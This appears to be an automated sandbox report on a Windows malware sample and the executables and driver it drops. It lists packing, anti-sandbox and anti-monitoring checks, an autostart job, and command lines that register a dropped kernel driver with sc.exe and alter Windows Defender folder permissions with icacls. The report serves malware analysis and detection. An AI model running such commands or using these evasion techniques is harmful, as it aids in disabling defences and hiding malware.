Static PE information: section where entry point is pointing to: .taggant

File is packed with WinRar

Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe

File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_5528031

Jump to behavior

PE file contains an invalid checksum

Source: rapes.exe.4.dr	Static PE information: real checksum: 0x1df9c6 should be: 0x1e75e1
Source: 39pazbF.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x3e1dd5
Source: xZRvIQ5.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0xb1cec
Source: apple.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x52234
Source: axplong.exe.1.dr	Static PE information: real checksum: 0x2dcb84 should be: 0x2dd5bc
Source: Rm3cVPI[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x64e65
Source: xZRvIQ5[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0xb1cec
Source: Rm3cVPI.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x64e65
Source: 22.exe.14.dr	Static PE information: real checksum: 0x0 should be: 0x1e9f1
Source: Or1ARiR[1].exe.11.dr	Static PE information: real checksum: 0x1e0154 should be: 0x1df774
Source: 39pazbF[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x3e1dd5
Source: Or1ARiR.exe.11.dr	Static PE information: real checksum: 0x1e0154 should be: 0x1df774
Source: SUAosT64HD.exe	Static PE information: real checksum: 0x2dcb84 should be: 0x2dd5bc
Source: 3d9778a1ff.exe.2.dr	Static PE information: real checksum: 0x1df9c6 should be: 0x1e75e1
Source: random[1].exe.2.dr	Static PE information: real checksum: 0x1df9c6 should be: 0x1e75e1
Source: apple[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x52234

PE file contains sections with non-standard names

Source: SUAosT64HD.exe	Static PE information: section name:
Source: SUAosT64HD.exe	Static PE information: section name: .idata
Source: SUAosT64HD.exe	Static PE information: section name: hsmahktm
Source: SUAosT64HD.exe	Static PE information: section name: vyraapnb
Source: SUAosT64HD.exe	Static PE information: section name: .taggant
Source: axplong.exe.1.dr	Static PE information: section name:
Source: axplong.exe.1.dr	Static PE information: section name: .idata
Source: axplong.exe.1.dr	Static PE information: section name: hsmahktm
Source: axplong.exe.1.dr	Static PE information: section name: vyraapnb
Source: axplong.exe.1.dr	Static PE information: section name: .taggant
Source: random[1].exe.2.dr	Static PE information: section name:
Source: random[1].exe.2.dr	Static PE information: section name: .idata
Source: random[1].exe.2.dr	Static PE information: section name:
Source: random[1].exe.2.dr	Static PE information: section name: ldnixbmt
Source: random[1].exe.2.dr	Static PE information: section name: ltyxvgaa
Source: random[1].exe.2.dr	Static PE information: section name: .taggant
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name:
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name: .idata
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name:
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name: ldnixbmt
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name: ltyxvgaa
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name: .taggant
Source: rapes.exe.4.dr	Static PE information: section name:
Source: rapes.exe.4.dr	Static PE information: section name: .idata
Source: rapes.exe.4.dr	Static PE information: section name:
Source: rapes.exe.4.dr	Static PE information: section name: ldnixbmt
Source: rapes.exe.4.dr	Static PE information: section name: ltyxvgaa
Source: rapes.exe.4.dr	Static PE information: section name: .taggant
Source: 39pazbF[1].exe.11.dr	Static PE information: section name: .didat
Source: 39pazbF.exe.11.dr	Static PE information: section name: .didat
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name:
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name: .rsrc
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name: .idata
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name:
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name: iphnbyse
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name: sbgczugd
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name: .taggant
Source: Or1ARiR.exe.11.dr	Static PE information: section name:
Source: Or1ARiR.exe.11.dr	Static PE information: section name: .rsrc
Source: Or1ARiR.exe.11.dr	Static PE information: section name: .idata
Source: Or1ARiR.exe.11.dr	Static PE information: section name:
Source: Or1ARiR.exe.11.dr	Static PE information: section name: iphnbyse
Source: Or1ARiR.exe.11.dr	Static PE information: section name: sbgczugd
Source: Or1ARiR.exe.11.dr	Static PE information: section name: .taggant
Source: xZRvIQ5[1].exe.11.dr	Static PE information: section name: .gxfg
Source: xZRvIQ5[1].exe.11.dr	Static PE information: section name: .retplne
Source: xZRvIQ5[1].exe.11.dr	Static PE information: section name: _RDATA
Source: xZRvIQ5[1].exe.11.dr	Static PE information: section name: .cSs
Source: apple[1].exe.11.dr	Static PE information: section name: .didat
Source: apple.exe.11.dr	Static PE information: section name: .didat
Source: xZRvIQ5.exe.11.dr	Static PE information: section name: .gxfg
Source: xZRvIQ5.exe.11.dr	Static PE information: section name: .retplne
Source: xZRvIQ5.exe.11.dr	Static PE information: section name: _RDATA
Source: xZRvIQ5.exe.11.dr	Static PE information: section name: .cSs
Source: 22.exe.14.dr	Static PE information: section name: .code

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Code function: 1_2_004BD84C push ecx; ret	1_2_004BD85F
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Code function: 1_2_004B122F pushad ; ret	1_2_004B1230
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Code function: 1_2_004B0B3B push esp; retf 0000h	1_2_004B0B3C
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_0069D84C push ecx; ret	2_2_0069D85F
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_0069DEF6 push ecx; ret	2_2_0069DF09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_0069D84C push ecx; ret	3_2_0069D85F
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_0069D84C push ecx; ret	10_2_0069D85F

Source: SUAosT64HD.exe	Static PE information: section name: entropy: 7.985136812848815
Source: axplong.exe.1.dr	Static PE information: section name: entropy: 7.985136812848815
Source: random[1].exe.2.dr	Static PE information: section name: entropy: 7.975444772690215
Source: random[1].exe.2.dr	Static PE information: section name: ldnixbmt entropy: 7.954880826054424
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name: entropy: 7.975444772690215
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name: ldnixbmt entropy: 7.954880826054424
Source: rapes.exe.4.dr	Static PE information: section name: entropy: 7.975444772690215
Source: rapes.exe.4.dr	Static PE information: section name: ldnixbmt entropy: 7.954880826054424
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name: entropy: 7.975318503956283
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name: iphnbyse entropy: 7.953999153405441
Source: Or1ARiR.exe.11.dr	Static PE information: section name: entropy: 7.975318503956283
Source: Or1ARiR.exe.11.dr	Static PE information: section name: iphnbyse entropy: 7.953999153405441

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe

File created: C:\Users\user\AppData\Local\Temp\ssisd.sys

Jump to behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10359660101\xZRvIQ5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\apple[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\39pazbF[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Or1ARiR[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\xZRvIQ5[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	File created: C:\Users\user\AppData\Local\Temp\22.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SUAosT64HD.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10359310101\Or1ARiR.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Rm3cVPI[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	File created: C:\Users\user\AppData\Local\Temp\ssisd.sys	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Creates job files (autostart)

Source: C:\Users\user\Desktop\SUAosT64HD.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"

Uses cacls to modify the permissions of files

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\icacls.exe icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t

Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\SUAosT64HD.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 50F293 second address: 50F299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 50F299 second address: 50F29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 687689 second address: 68769D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E5380h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 687960 second address: 687966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 687966 second address: 687974 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FC3507E5376h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 687AB8 second address: 687AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E727h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 68AE02 second address: 68AE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 68AF67 second address: 68AF7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC350C3E71Bh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 68B0B0 second address: 68B0B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 68B14D second address: 68B157 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 68B157 second address: 68B15D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 673688 second address: 67368C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 67368C second address: 67369D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FC3507E5376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8751 second address: 6A875D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC350C3E716h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8890 second address: 6A8896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8896 second address: 6A88A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FC350C3E716h 0x0000000d jnc 00007FC350C3E716h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A89FE second address: 6A8A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E537Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8A0F second address: 6A8A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8A13 second address: 6A8A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8CE4 second address: 6A8CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8DFA second address: 6A8E06 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC3507E5376h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8E06 second address: 6A8E4A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007FC350C3E716h 0x00000009 jmp 00007FC350C3E71Eh 0x0000000e pop esi 0x0000000f jc 00007FC350C3E71Ch 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c jmp 00007FC350C3E729h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8E4A second address: 6A8EA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5389h 0x00000007 jmp 00007FC3507E5384h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FC3507E537Ah 0x00000014 jmp 00007FC3507E537Fh 0x00000019 popad 0x0000001a jns 00007FC3507E537Eh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8EA8 second address: 6A8EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A8EAE second address: 6A8EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
